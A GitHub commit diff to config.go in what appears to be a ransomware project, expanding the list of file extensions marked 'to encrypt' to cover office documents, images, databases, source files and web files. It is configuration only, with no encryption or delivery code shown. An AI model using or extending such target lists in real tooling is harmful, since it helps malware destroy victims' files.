Skip to content

Commit

Permalink
Update extensions
Browse files Browse the repository at this point in the history
  • Loading branch information
wille committed Jan 18, 2017
1 parent bbb17ff commit 2d5ad6f
Showing 1 changed file with 19 additions and 3 deletions.
22 changes: 19 additions & 3 deletions config.go
Original file line number Diff line number Diff line change
Expand Up @@ -2,10 +2,26 @@ package main

// Extensions to encrypt
var Extensions = [...]string{
"png",
"txt",
"doc",
"docx",
"xls",
"xlsx",
"ppt",
"pptx",
"odt",
"jpg",
"jpeg",
"tif",
"png",
"csv",
"sql",
"mdb",
"sln",
"php",
"asp",
"aspx",
"html",
"xml",
"psd",
}

// IgnoreDirs will skip directories that contains the string
Expand Down

0 comments on commit 2d5ad6f

Please sign in to comment.